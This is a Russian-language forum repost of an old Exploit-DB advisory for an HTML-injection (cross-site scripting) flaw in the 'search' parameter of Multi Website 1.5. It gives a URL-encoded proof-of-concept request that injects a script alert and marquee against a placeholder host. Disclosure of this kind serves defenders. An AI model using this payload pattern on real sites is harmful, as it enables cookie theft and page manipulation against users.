Exploit Multi Website 1.5 - 'search' HTML Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
34632
Проверка EDB
  1. Пройдено
Автор
599EME MAN
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2009-3162
Дата публикации
2009-08-06
Multi Website 1.5 - 'search' HTML Injection
Код:
source: https://www.securityfocus.com/bid/43245/info

Multi Website is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

Multi Website 1.5 is vulnerable; other versions may also be affected.

http://www.example.com/demo/?action=search&search=%27%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3CMARQUEE+BGCOLOR%3D%22RED%22%3E%3CH1%3EXss%3C%2FH1%3E%3C%2FMARQUEE%3E&gateway=%E4%E3%D8+%C7%E1%C8%CD%CB&by=words
 
Источник
www.exploit-db.com

Похожие темы